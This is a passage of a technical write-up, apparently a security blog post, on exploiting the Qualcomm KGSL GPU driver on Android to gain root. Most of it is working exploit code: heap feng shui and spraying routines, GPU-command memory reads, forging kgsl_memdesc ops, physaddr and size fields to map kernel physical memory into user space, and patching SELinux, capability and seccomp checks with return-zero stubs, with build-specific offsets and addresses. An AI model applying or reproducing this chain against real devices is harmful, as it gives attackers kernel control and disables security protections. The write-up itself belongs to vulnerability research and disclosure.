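	return (md->physaddr >> TOY_PAGE_SHIFT) + (off >> TOY_PAGE_SHIFT);
}

static const struct toy_memdesc_ops toy_page_ops = { toy_page_vmfault };
static const struct toy_memdesc_ops toy_contiguous_ops = { toy_contiguous_vmfault };

/* A generic fault path only ever dispatches through md->ops. */
static uint64_t toy_fault(const struct toy_memdesc *md, uint64_t off)
{
	return md->ops->vmfault(md, off);
}
```

With md->ops = &toy_contiguous_ops, physaddr = 0xa8010000 and size = 0x4000000, a fault at offset 0x1000 resolves to PFN 0xa8011, whatever pages the object originally owned.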

This means we can not only make the driver remap according to our parameters, but also map the target physical memory range into user space, which lays the foundation for stable read/write primitives; in the extreme, it could in theory map a large range of kernel physical memory.

Tampering with memdesc->ops runs into KASLR (address randomization): we need the address of kgsl_contiguous_ops. However, the relative offsets between symbols within the same module are usually fixed. In my testing, the address difference between kgsl_contiguous_ops and kgsl_page_ops is a constant 0xc0, so no brute force is needed: as long as one of them is leaked or known, we can infer the other.
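The arithmetic can be checked against the two kallsyms addresses from the test device, 0xffffffe4c1cc2d50 (kgsl_contiguous_ops) and 0xffffffe4c1cc2e10 (kgsl_page_ops). The helper name is hypothetical; it simply subtracts the build-specific delta from a leaked kgsl_page_ops pointer, which is what the patching code does with its fixed - 0xc0.

```c
#include <assert.h>
#include <stdint.h>

/* Addresses read from /proc/kallsyms on the test device. Under KASLR both
 * move on every boot; only their difference is expected to stay fixed for
 * a given msm_kgsl build. */
#define KALLSYMS_CONTIGUOUS_OPS 0xffffffe4c1cc2d50ULL
#define KALLSYMS_PAGE_OPS       0xffffffe4c1cc2e10ULL

/* Hypothetical helper: derive kgsl_contiguous_ops from a leaked kgsl_page_ops. */
static uint64_t contiguous_ops_from_page_ops(uint64_t page_ops, uint64_t delta)
{
	return page_ops - delta;
}
```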

```
nuwa:/ # cat /proc/kallsyms|grep kgsl_contiguous_ops
ffffffe4c1cc2d50 r kgsl_contiguous_ops [msm_kgsl]
nuwa:/ # cat /proc/kallsyms| grep kgsl_page_ops
ffffffe4c1cc2e10 r kgsl_page_ops [msm_kgsl]
```

Heap Feng Shui

Due to KGSL fragmentation and caching mechanisms, even if we “free” a GPU buffer, the physical pages it corresponds to may not immediately return to the system’s general page allocator. In many cases, these pages will first be reclaimed and reused by KGSL’s page cache/page pool (for example kgsl_page_pool) for subsequent GPU memory allocations, rather than being fully returned to the buddy allocator.

This creates a direct problem: when we spray the kernel heap, we may not be able to reclaim the target physical pages at all, because they are still held by KGSL’s pool. Even if the spray objects are allocated successfully, they may not land at the physical locations we want.

I observed this directly: after heap spraying, the contents at the target physical address were unchanged, which showed that those pages had never become available for our spray to occupy.

To solve this problem, we need a round of heap feng shui: by allocating a large amount of GPU memory in a short time and creating stronger memory pressure, we force some cached pages to flow out of KGSL’s internal reclaim path and back into the kernel’s general memory management.

The heap feng shui logic I used creates multiple processes that allocate memory and then kills them, to trigger the reclaim chain:

```c
void heap_fengshui(int num)
{
    info("Starting heap fengshui\n");
    int pid[num];

    // Spawn num child processes that allocate memory (do_alloc is not shown)
    for (int i = 0; i < num; i++) {
        pid[i] = do_alloc();
    }
    if (num == 1)
        usleep(5000);
    else
        sleep(3);

    // Kill them all so their memory is released at once, then reap them
    for (int i = 0; i < num; i++) {
        kill(pid[i], SIGKILL);
    }
    for (int i = 0; i < num; i++) {
        wait(NULL);
    }
    ok("Finish heap fengshui\n");
}
```

Exploitation flow



1. Control a batch of target physical pages through the race (for example, try 200 times, aiming to reliably obtain multiple controllable/reusable physical addresses).
2. Make these pages as occupiable as possible (with heap feng shui).
3. Allocate a large number of kgsl_mem_entry / kgsl_memdesc objects for heap spraying and try to occupy the target pages.
4. Use metadata as a memory marker to locate the kgsl_mem_entry through the GPU-readable path.
5. Forge the key fields (ops/physaddr/size) so that the page-fault (vmfault) path rebuilds the mapping from our physaddr/size.
6. mmap the object via its obj_id to map kernel physical memory into user space, then patch the kernel to obtain root.

A pitfall: I initially made a basic mistake and kept occupying the same block. I simply looped 200+ times doing “allocate → free”, thinking this would accumulate 200 different controllable pages. In practice, each allocation is very likely to reuse the block freed in the previous iteration, so despite the many iterations the loop keeps circling the same location and the hit rate is very low. A better approach is to hold the whole batch of objects first and release them together only after the loop ends.
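The effect is easy to reproduce with a toy LIFO allocator, which is an assumption standing in for KGSL's page pool or any other free list that hands back the most recently freed block first. distinct_slots() counts how many different slots n rounds touch, either freeing each object immediately or holding the whole batch until the end.

```c
#include <assert.h>

#define NSLOTS 8

/* Toy LIFO allocator: the most recently freed slot is handed out first. */
struct toy_pool {
	int free_stack[NSLOTS];
	int top; /* number of free slots on the stack */
};

static void pool_init(struct toy_pool *p)
{
	p->top = 0;
	for (int i = NSLOTS - 1; i >= 0; i--)
		p->free_stack[p->top++] = i; /* slot 0 ends up on top */
}

static int pool_alloc(struct toy_pool *p)
{
	return p->top > 0 ? p->free_stack[--p->top] : -1;
}

static void pool_free(struct toy_pool *p, int slot)
{
	p->free_stack[p->top++] = slot;
}

/* Counts distinct slots touched by n rounds of "allocate" followed either by
 * an immediate free (hold_until_end == 0) or by a batch free at the end. */
static int distinct_slots(int n, int hold_until_end)
{
	struct toy_pool p;
	int held[NSLOTS], seen[NSLOTS] = {0}, count = 0;

	pool_init(&p);
	for (int i = 0; i < n; i++) {
		int s = pool_alloc(&p);
		if (s < 0)
			break; /* pool exhausted */
		if (!seen[s]) {
			seen[s] = 1;
			count++;
		}
		if (hold_until_end)
			held[i] = s;       /* keep it, so the next round gets a new slot */
		else
			pool_free(&p, s);  /* goes straight back on top of the stack */
	}
	if (hold_until_end)
		for (int i = 0; i < n && i < NSLOTS; i++)
			pool_free(&p, held[i]); /* release the whole batch at once */
	return count;
}
```

distinct_slots(5, 0) touches a single slot, while distinct_slots(5, 1) touches five.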

Batch race control of physical pages

The code is as follows:

```c
info("Starting GPU trigger sequence...\n");
for (int i = 0; i < MAX_GPU_OBJ; i++) {
    uint64_t *res = (uint64_t *)gpu_trigger(i); // obtain the GPU object each iteration
    if ((uint64_t)res == 0xffffffffffffffff) {
        err("Failed to trigger GPU object at index %d\n", i);
        i--; // retry this index
        //goto _fail;
    } else {
        gpu_obj[i] = res;
        ok("get gpu_addr : %lx , id = %d\n", gpu_obj[i], i);
    }
}

// Free the occupy objs only now, for the subsequent heap spray.
// If they are freed too early, it is easy to reallocate the same memory.
for (int i = 0; i < MAX_GPU_OBJ; i++) {
    struct kgsl_gpuobj_free free_obj;
    memset(&free_obj, 0, sizeof(free_obj));
    free_obj.id = occupy_objs[i];
    info("free occupy_objs[%d]=%d\n", i, occupy_objs[i]);
    if (ioctl(fd, IOCTL_KGSL_GPUOBJ_FREE, &free_obj)) {
        perror("[-] ioctl IOCTL_KGSL_GPUOBJ_FREE failed");
    }
}
```

Heap spray (heapspray)

Use a large number of kgsl_mem_entry objects to occupy the freed physical pages; the code is as follows:

```c
int do_exploit_2()
{
    heap_fengshui(80);
    heap_spray(0x29000);
    //trigger_memory_shrink();
    //info("manually free cache\n");
    //system("echo 3 > /proc/sys/vm/drop_caches");
    return search_memdesc_exploit();
}

void heap_spray(int num)
{
    info("Heap Spray");
    const int loop_count = num; // define loop count constant
    int id_array[loop_count];   // declare array to store IDs
    uint64_t alloc_size = PAGE_CNT; //0x1000;//PAGE_CNT * 0x1000; // too large here takes too much space
    info("heap spray\n");

    // create GPU objects in a loop
    for (int i = 0; i < loop_count; i++) {
        // allocate GPU objects with metadata
        id_array[i] = kgsl_gpu_alloc_occupy(fd,
                                            KGSL_MEMFLAGS_USE_CPU_MAP,
                                            alloc_size);
        // error handling
        if (id_array[i] < 0) {
            err("Allocation failed at iteration %d, error code: %d\n", i + 1, id_array[i]);
            break;
        }
        info("Successfully created object #%d, ID: %d\n", i + 1, id_array[i]);
    }
    ok("Heap Spray success");
}
```

KGSL structure lookup and modification

After heap spraying + fengshui, we need to locate and modify kgsl_mem_entry: traverse metadata to locate the target structure, and further parse field offsets of kgsl_memdesc. There is a practical constraint here: vbo-class objects do not have a direct mmap view, so they cannot be simply mmap’ed into user space to scan like normal gpuobj. Therefore, we need to use GPU commands (such as CP_MEM_TO_MEM) to copy the contents of GPU VA into the cmd_buffer region that we can read, and then fetch it back on the CPU side.

static const uint64_t gpu_readall(uint64_t addr, size_t count, void *results)

{

assert(count <= 0x3000);

const uint32_t magic = rand();

size_t offset_scratch = 0x10;

size_t offset_ret = offset_scratch + 0xd0000;

size_t offset_value = offset_scratch + 0xd0000 + 8;

uint32_t *cmds_start = (uint32_t *)(cmd_buffer + offset_scratch);

uint32_t *cmds = cmds_start;

for (size_t i = 0; i < count; i++) {

*cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);

*cmds++ = 0;

cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_value + i * 8);

//cmds += cp_gpuaddr(cmds, addr + i*4 );

cmds += cp_gpuaddr(cmds, addr + i*8 );

*cmds++ = cp_type7_packet(CP_MEM_TO_MEM, 5);

*cmds++ = 0;

cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_value + i*8 + 4);

//cmds += cp_gpuaddr(cmds, addr + i*4 + 4);

cmds += cp_gpuaddr(cmds, addr + i*8 + 4);

}

*cmds++ = cp_type7_packet(CP_MEM_WRITE, 3);

cmds += cp_gpuaddr(cmds, cmd_buffer_gpu_addr + offset_ret);

*cmds++ = magic;

__clear_cache(cmds_start, cmds);

usleep(10000);

if (kgsl_gpu_command_n(fd, drawctxt_id, cmd_buffer_gpu_addr + offset_scratch, (uintptr_t)(cmds) - (uintptr_t)(cmds_start), 1) == -1) {

printf("gread8: gpu command");

getchar();

return -1;

}

volatile uint32_t *p = (volatile uint32_t *)(cmd_buffer + offset_ret);

for (int i = 0; *p != magic; i++) {

//printf("%d\n", *p);

usleep(10000);

// fprintf(stderr, "gread %#x...\n", *p);

__clear_cache(cmd_buffer, cmd_buffer + 0x100000);

}

__clear_cache(cmd_buffer, cmd_buffer + 0x100000);

memcpy(results, cmd_buffer + offset_value, 8 * count);

return 0;



}After finding metadata in memory, we can follow the trail to locate kgsl_mem_entry / kgsl_memdesc, and further read out key fields.

The structure layout offsets I extracted on this version are as follows. They will vary across devices and build configs; also, the address I searched for is itself offset by 0x8, so all offsets here are shifted accordingly:

- gpuaddr_offset = 0x190

- physaddr_offset = 0x188

- size_offset = 0x180

- kgsl_memdeesc_ops_offset = 0x168

- gpuobj_id_offset = 0x18 (very important; used to find the corresponding obj)
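The patching code turns these byte offsets into addresses with expressions like gpu_obj[i] + j - physaddr_offset / 8. Assuming gpu_obj[i] is a uint64_t * and j indexes 8-byte words (the declarations are not shown), both + and - count 8-byte words, so the expression only works because every offset is a multiple of 8. The hypothetical helper below spells out the equivalent byte arithmetic. The test also shows that gpuaddr, physaddr and size are adjacent 8-byte fields in this layout.

```c
#include <assert.h>
#include <stdint.h>

/* Byte offsets before the metadata marker, as listed for this build. */
enum {
	GPUADDR_OFF  = 0x190,
	PHYSADDR_OFF = 0x188,
	SIZE_OFF     = 0x180,
	OPS_OFF      = 0x168,
	ID_OFF       = 0x18,
};

/* Hypothetical helper: address of a field byte_off bytes before word j of a
 * region starting at base. Equal to (uint64_t)(p + j - byte_off / 8) when p
 * is a uint64_t * holding base. */
static uint64_t field_addr(uint64_t base, uint64_t j, uint64_t byte_off)
{
	assert(byte_off % 8 == 0); /* only 8-byte-aligned fields */
	return base + j * sizeof(uint64_t) - byte_off;
}
```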

After finding the target entry:

1. Read the original kgsl_memdesc_ops (usually kgsl_page_ops).
2. Change it to kgsl_contiguous_ops using the verified fixed offset (here, -0xc0).
3. Overwrite physaddr and size, so that the page-fault (vmfault) path uses vmf_insert_pfn to establish the mapping over the address range we provide.

```c
// (excerpt from the scan loop; the loop itself is not shown)
if (res == 0x4D4D4D4D4D4D4D4D) { // metadata marker "MMMMMMMM"
    found = 1;
    ok("j=%d\n", j);
    ok("!!!!!! gpu read %lx: %lx\n", gpu_obj[i] + j, res);
    info("finish search memdesc, found\n");
    dump_memory_hex(results, data_size, (uint64_t) gpu_obj[i]);

    // Patch the kgsl_mem_entry structure
    int gpuaddr_offset = 0x190;
    int physaddr_offset = 0x188;
    int size_offset = 0x180;
    int kgsl_memdeesc_ops_offset = 0x168;
    int gpuobj_id_offset = 0x18;

    uint64_t physaddr_addr = (uint64_t)(gpu_obj[i] + j - physaddr_offset / 8);
    uint64_t physaddr = gpu_read(physaddr_addr);
    printf("physaddr addr:%llx\t", physaddr_addr);
    printf("physaddr:%llx\n", physaddr);

    uint64_t physize_addr = (uint64_t)(gpu_obj[i] + j - size_offset / 8);
    uint64_t physize = gpu_read(physize_addr);
    printf("physize addr:%llx\t", physize_addr);
    printf("physize:%llx\n", physize);

    uint64_t kgsl_memdeesc_ops_addr = (uint64_t)(gpu_obj[i] + j - kgsl_memdeesc_ops_offset / 8);
    uint64_t kgsl_memdeesc_ops = gpu_read(kgsl_memdeesc_ops_addr);
    printf("kgsl_memdeesc_ops addr:%llx\t", kgsl_memdeesc_ops_addr);
    printf("kgsl_memdeesc_ops(kgsl_page_ops):%llx\n", kgsl_memdeesc_ops);

    uint64_t gpuobj_id_addr = (uint64_t)(gpu_obj[i] + j - gpuobj_id_offset / 8);
    uint64_t gpuobj_id = gpu_read(gpuobj_id_addr);
    printf("gpuobj_id addr:%llx\t", gpuobj_id_addr);
    printf("gpuobj_id:%llx\n", gpuobj_id);

    // Patch kgsl_memdeesc_ops: kgsl_page_ops -> kgsl_contiguous_ops (fixed offset)
    uint64_t new_kgsl_contiguous_ops = kgsl_memdeesc_ops - 0xc0;
    printf("kgsl_contiguous_ops:%llx\t", new_kgsl_contiguous_ops);
    gpu_write(kgsl_memdeesc_ops_addr, new_kgsl_contiguous_ops);
    printf("kgsl_memdeesc_ops(kgsl_contiguous_ops):%llx\n", gpu_read(kgsl_memdeesc_ops_addr));

    // Patch physaddr and physize parameters
    uint64_t physaddr_cover = 0xa8010000;
    uint64_t physsize_cover = 0x4000000;
    printf("physaddr:%llx\n", physaddr_cover);
    printf("physsize:%llx\n", physsize_cover);
    gpu_write(physaddr_addr, physaddr_cover);
    gpu_write(physize_addr, physsize_cover);

    physaddr = gpu_read(physaddr_addr);
    printf("new physaddr:%llx\n", physaddr);
    physize = gpu_read(physize_addr);
    printf("new physize:%llx\n", physize);
```

After obtaining the corresponding gpuobj_id, we can directly mmap its CPU view (the offset is usually id * 0x1000), thereby mapping the forged “physical address range” into user space:

void *kernel = mmap(0, 0x4000000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, gpuobj_id * 0x1000); // try to mmap the corresponding gpuobj_id

if (kernel == (void *)-1) {

perror("[-] cpu_buffer mmap failed");

return 0;

}

dump_hex(kernel, 0x1000);

hexdump_to_file(kernel, 0x4000000, "kernel.bin", true); // dump kernel



printf("Kernel mmaped at %p", kernel);Kernel patch

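With kernel memory mapped, patching kernel code in place is enough to obtain root. The code below overwrites the entry of several security-check functions with a two-instruction stub that returns 0: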

```c
// kernel patch
uint64_t __text = 0xffffffdf7fa00000;
uint64_t __secure_computing = 0xffffffdf7fce80a8 - __text - 0x10000;
uint64_t cap_capable = 0xffffffdf8012cd08 - __text - 0x10000;
uint64_t selinux_capable = 0xffffffdf8013cf5c - __text - 0x10000;
uint64_t selinux_enforcing_boot = 0xffffffdf821b6aec - __text - 0x10000;
uint64_t security_capable = 0xffffffdf8012e9e4 - __text - 0x10000;
uint64_t avc_has_perm = 0xffffffdf8013a68c - __text - 0x10000;
uint64_t syscall_trace_enter = 0xffffffdf7fabe684 - __text - 0x10000;
uint64_t bpf_get_current_pid_tgid = 0xffffffdf7fd6a5b0 - __text - 0x10000;
uint64_t bpf_get_current_uid_gid = 0xffffffdf7fd6a608 - __text - 0x10000;
uint64_t bpf_probe_read_kernel_str = 0xffffffdf7fd2af34 - __text - 0x10000;
uint64_t bpf_probe_read_kernel = 0xffffffdf7fd2ae6c - __text - 0x10000;

printf("avc_has_perm: %p\n", (void *)(avc_has_perm));
printf("__secure_computing: %p\n", (void *)(__secure_computing));
printf("cap_capable: %p\n", (void *)(cap_capable));
printf("selinux_capable: %p\n", (void *)(selinux_capable));
printf("selinux_enforcing_boot: %p\n", (void *)(selinux_enforcing_boot));
printf("security_capable: %p\n", (void *)(security_capable));
printf("syscall_trace_enter: %p\n", (void *)(syscall_trace_enter));

uint64_t mov_x0_0_ret = 0xd65f03c0d2800000;

// Bypass uid and gid checker
memcpy(kernel + __secure_computing, &mov_x0_0_ret, 8);
memcpy(kernel + security_capable, &mov_x0_0_ret, 8);
memcpy(kernel + syscall_trace_enter, &mov_x0_0_ret, 8);

// Bypass SELinux
//if (brand == BRAND_XIAOMI) {
memcpy(kernel + avc_has_perm, &mov_x0_0_ret, 8);
memcpy(kernel + selinux_capable, &mov_x0_0_ret, 8);
//}

// Bpf Faker
//if (brand == BRAND_XIAOMI) {
memcpy(kernel + bpf_get_current_pid_tgid, &mov_x0_0_ret, 8);
memcpy(kernel + bpf_get_current_uid_gid, &mov_x0_0_ret, 8);
memcpy(kernel + bpf_probe_read_kernel_str, &mov_x0_0_ret, 8);
memcpy(kernel + bpf_probe_read_kernel, &mov_x0_0_ret, 8);
//}

printf("Patch kernel done\n");
hexdump_to_file(kernel, 0x4000000, "kernel_patched.bin", true); // dump kernel
free(results);
```

After patching, running su directly yields root, and SELinux can also be disabled.
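The 8-byte value mov_x0_0_ret written by the patch code is two A64 instructions packed into one uint64_t. The sketch below is a standalone check, not part of the exploit: it splits the constant the way memcpy lays it out in memory on a little-endian host (arm64 Android runs little-endian) and compares each half with the standard encodings of mov x0, #0 (MOVZ) and ret (RET X30). The macro and function names are illustrative.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define A64_MOVZ_X0_0 0xd2800000u /* mov x0, #0  (MOVZ X0, #0, LSL #0) */
#define A64_RET       0xd65f03c0u /* ret         (RET X30) */

/* Split an 8-byte patch into the two 32-bit words it places in memory.
 * insn[0] lands at the lower address; this matches an arm64 target only
 * when the host is little-endian as well. */
static void split_patch(uint64_t patch, uint32_t insn[2])
{
	memcpy(insn, &patch, 2 * sizeof(uint32_t));
}
```

So the first instruction executed at each patched function entry sets the return register x0 to 0, and the second returns immediately to the caller.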

Full exploitation demo:

Demo Video

I uploaded the PPT walkthrough and demo video to Bilibili:

References and Acknowledgements

Special thanks to @Resery4 for the help.

References:

https://googleprojectzero.blogspot.com/2020/09/attacking-qualcomm-adreno-gpu.html

https://dawnslab.jd.com/android_gpu_attack_defence_introduction/